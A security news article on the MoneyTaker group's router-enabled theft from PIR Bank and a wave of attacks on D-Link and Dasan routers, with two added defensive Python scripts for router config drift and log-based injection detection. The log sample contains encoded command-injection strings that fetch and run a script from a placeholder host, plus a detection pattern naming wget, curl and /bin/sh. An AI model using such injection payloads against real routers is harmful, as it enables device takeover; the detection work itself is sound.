Router Compromise Enables $1 Million Bank Cyberheist

A cybercriminal group known for targeting financial institutions has managed to steal almost $1 million from a large Russian bank after hacking into a router at one of its regional branches.

The group, known in the security industry as MoneyTaker, has been operating since at least 2016 and has targeted banks from the United States, U.K. and Russia. The group uses advanced techniques such as setting up new infrastructure for every attack, lurking inside networks for months before striking and using “fileless” malware techniques and tools such as Metasploit and the PowerShell Empire framework to remain undetected.

In the group’s latest attack, which was investigated by researchers from cybercrime intelligence firm Group-IB, the hackers compromised a router at a regional branch of Russian bank PIR Bank, then used the network tunnels configured on the device to reach the bank’s main network and move laterally through it.

This technique is characteristic of MoneyTaker and has been used in at least three attacks against banks with regional branch networks, Group-IB said in a report shared via email. While in the PIR Bank’s main network, the hackers managed to gain access to the Automated Work Station Client of the Russian Central Bank (AWS CBR) and initiated rogue payment orders.

The money was sent to accounts set up at 17 other banks and was immediately cashed out by money mules at ATMs. By the time PIR Bank’s employees discovered the rogue transfers and notified the Central Bank, it was already too late to reverse them.

After executing the attack, the hackers deleted OS logs from workstations and servers to hinder forensic investigation but left behind some reverse shells so they could regain access to the network at a later time if needed.

“It is evident that MoneyTaker is one of the top threats to banks all over the world,” Group-IB said. “Since the entry point in most successful attacks conducted by this group was routers, it is first necessary to check if you have the up-to-date firmware, test systems for brute-force vulnerabilities and detect changes in router configuration in a timely manner.”

Routers increasingly are targeted by hackers and, as shown by this incident, they can serve as launch pads for further attacks against local systems. Since routers don’t typically have security software running on them, discovering that they’ve been compromised can take a very long time, giving attackers a persistent foothold into local networks.
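One practical way to act on the “detect changes in router configuration” advice, when the router itself runs no security software, is to pull its configuration on a schedule and diff it against a known-good baseline, paging on changes to tunnels, users and routes. The script below is an added example written for this article, not Group-IB’s or PIR Bank’s tooling; the two configs are constructed, use an IOS-like syntax chosen for illustration, and the device name “branch-rtr-01” and the tunnel endpoints are hypothetical.

```python
"""Detect security-relevant drift in a router configuration snapshot.

Added example with constructed data. In production both texts would be
pulled from the device over SSH and the baseline stored off-box.
"""
import hashlib
from typing import Dict, List

# Constructed known-good baseline for a hypothetical branch router.
BASELINE = """\
hostname branch-rtr-01
username admin privilege 15 secret 5 $1$abcd$baselinehash
interface GigabitEthernet0/0
 ip address 10.10.1.1 255.255.255.0
interface Tunnel0
 tunnel source GigabitEthernet0/0
 tunnel destination 203.0.113.10
ip route 0.0.0.0 0.0.0.0 10.10.1.254
"""

# Constructed later snapshot: a new privileged user, a re-pointed tunnel and
# a brand-new tunnel, the kind of drift that precedes lateral movement.
SNAPSHOT = """\
hostname branch-rtr-01
username admin privilege 15 secret 5 $1$abcd$baselinehash
username support privilege 15 secret 5 $1$zzzz$attackerhash
interface GigabitEthernet0/0
 ip address 10.10.1.1 255.255.255.0
interface Tunnel0
 tunnel source GigabitEthernet0/0
 tunnel destination 198.51.100.7
interface Tunnel1
 tunnel source GigabitEthernet0/0
 tunnel destination 192.0.2.44
ip route 0.0.0.0 0.0.0.0 10.10.1.254
"""

# Statement prefixes whose addition or removal should alert rather than
# merely be logged. Extend for your platform (VPN, NAT, SNMP, ACLs ...).
SENSITIVE_PREFIXES = ("username ", "interface Tunnel", "tunnel destination",
                      "ip route ", "snmp-server ", "access-list ")


def config_fingerprint(text: str) -> str:
    """SHA-256 over non-empty, right-trimmed lines: cheap to store and compare."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    return hashlib.sha256("\n".join(lines).encode()).hexdigest()


def _qualified_lines(text: str) -> List[str]:
    """Prefix each indented child line with its top-level parent so that a
    changed 'tunnel destination' is attributed to the right interface."""
    out: List[str] = []
    parent = ""
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith(" "):
            out.append(f"{parent} :: {raw.strip()}")
        else:
            parent = raw.strip()
            out.append(parent)
    return out


def _is_sensitive(line: str) -> bool:
    leaf = line.split(" :: ")[-1]
    return any(line.startswith(p) or leaf.startswith(p) for p in SENSITIVE_PREFIXES)


def config_drift(baseline: str, snapshot: str) -> Dict[str, List[str]]:
    """Return added/removed statements and the subset that warrants an alert."""
    base, now = set(_qualified_lines(baseline)), set(_qualified_lines(snapshot))
    added, removed = sorted(now - base), sorted(base - now)
    return {
        "added": added,
        "removed": removed,
        "alerts": sorted(ln for ln in added + removed if _is_sensitive(ln)),
    }


if __name__ == "__main__":
    if config_fingerprint(BASELINE) != config_fingerprint(SNAPSHOT):
        for alert in config_drift(BASELINE, SNAPSHOT)["alerts"]:
            print("ALERT:", alert)
```

The fingerprint is the cheap first check (one hash per poll); only when it changes does the script compute and classify the diff. Qualifying child lines with their parent is what turns “a tunnel destination changed somewhere” into “Tunnel0 now points at 198.51.100.7”, which is the detail an incident responder needs.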

The sophisticated VPNFilter malware, which has infected more than 500,000 routers around the world and is believed to be the work of a Russian state-sponsored cyberespionage group, targets small-business router models from many manufacturers. The malware was recently used to launch an attack against a Chlorine plant in Ukraine.

Renewed Wave of Attacks Targets D-Link and Dasan Routers

A new wave of attacks has hit home and small-business routers made by D-Link and Dasan, driven by hackers’ growing interest in recruiting routers into IoT botnets.

Cybersecurity firm eSentire observed exploit attempts against D-Link 2750B and Dasan GPON routers coming from more than 3,000 different source IP addresses on July 19. The attackers used a Python script to exploit known command injection and remote code execution flaws in older D-Link 2750B firmware, as well as critical vulnerabilities in GPON routers made by Dasan Networks that were disclosed publicly in May.
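A wave like the one eSentire describes has two tells in web-server or router access logs: request parameters that decode to shell metacharacters, and many distinct source addresses hitting the same endpoint within a short window. The script below is an added example written for this article, not eSentire’s code. The log lines are constructed, and the endpoint “/cgi-bin/diag” and the addresses in it are placeholders, not a real vulnerable path or real attacker infrastructure.

```python
"""Flag command-injection attempts and count distinct sources per endpoint.

Added example over constructed common-log-format lines. The endpoint and
all IPs are placeholders from documentation ranges.
"""
import re
from collections import defaultdict
from typing import Dict, List
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)
# Shell metacharacters, command substitution and the download-and-run
# verbs that router botnet droppers typically smuggle into a parameter.
INJECTION_RE = re.compile(r"[;|`]|\$\(|&&|\bwget\b|\bcurl\b|/bin/sh|\btftp\b")

# Constructed sample: one benign probe, one benign use of the endpoint and
# four injection attempts from three source addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Jul/2018:10:00:01 +0000] "GET / HTTP/1.1" 200 512
198.51.100.11 - - [19/Jul/2018:10:00:02 +0000] "POST /cgi-bin/diag?host=127.0.0.1%3Bwget%20http%3A%2F%2F192.0.2.9%2Fa.sh%3Bsh%20a.sh HTTP/1.1" 200 88
198.51.100.12 - - [19/Jul/2018:10:00:02 +0000] "POST /cgi-bin/diag?host=127.0.0.1%60wget%20192.0.2.9%2Fa.sh%60 HTTP/1.1" 200 88
198.51.100.13 - - [19/Jul/2018:10:00:03 +0000] "POST /cgi-bin/diag?host=%24%28wget%20192.0.2.9%29 HTTP/1.1" 500 0
198.51.100.11 - - [19/Jul/2018:10:00:04 +0000] "POST /cgi-bin/diag?host=127.0.0.1%3Bcurl%20192.0.2.9 HTTP/1.1" 200 88
203.0.113.8 - - [19/Jul/2018:10:00:05 +0000] "GET /cgi-bin/diag?host=8.8.8.8 HTTP/1.1" 200 88
"""


def injection_hits(log: str) -> List[dict]:
    """Return one record per request whose URL-decoded URI looks like injection.

    Decoding first matters: '%3B' and '%60' would sail past a raw match.
    """
    hits = []
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote(m["uri"])
        if INJECTION_RE.search(decoded):
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "path": decoded.split("?", 1)[0],
                "decoded_uri": decoded,
            })
    return hits


def campaigns(hits: List[dict], min_sources: int = 3) -> Dict[str, int]:
    """Endpoints attacked from at least `min_sources` distinct addresses.

    One source poking one endpoint is a scanner; dozens or thousands hitting
    the same endpoint with the same payload shape is a recruitment sweep.
    """
    by_path = defaultdict(set)
    for h in hits:
        by_path[h["path"]].add(h["ip"])
    return {path: len(ips) for path, ips in by_path.items() if len(ips) >= min_sources}


if __name__ == "__main__":
    found = injection_hits(SAMPLE_LOG)
    for h in found:
        print(h["ts"], h["ip"], h["decoded_uri"])
    print("campaigns:", campaigns(found))
```

Tune `min_sources` to your traffic: on a single branch router a handful of distinct sources against one CGI endpoint is already abnormal, while a public-facing fleet would use a much higher threshold plus a time window.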

“A successful recruitment campaign has the potential to arm the associated threat actor(s) with DDoS artillery and facilitate espionage of private browsing habits,” the eSentire researchers said in a blog post. “Botnets built using compromised routers may eventually be offered as a service to other threat actors, used for extorting DDoS victims among other uses.”

Also this week, a hacker managed to build a botnet of over 18,000 devices in a single day by exploiting a vulnerability in Huawei HG532 routers. The flaw, tracked as CVE-2017-17215, has been known and patched since 2017, but the fact that there are still so many vulnerable routers out there after all this time shows why IoT botnets are a growing threat.

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor's degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at [email protected] or @lconstantin on Twitter. For encrypted email, his PGP key's fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42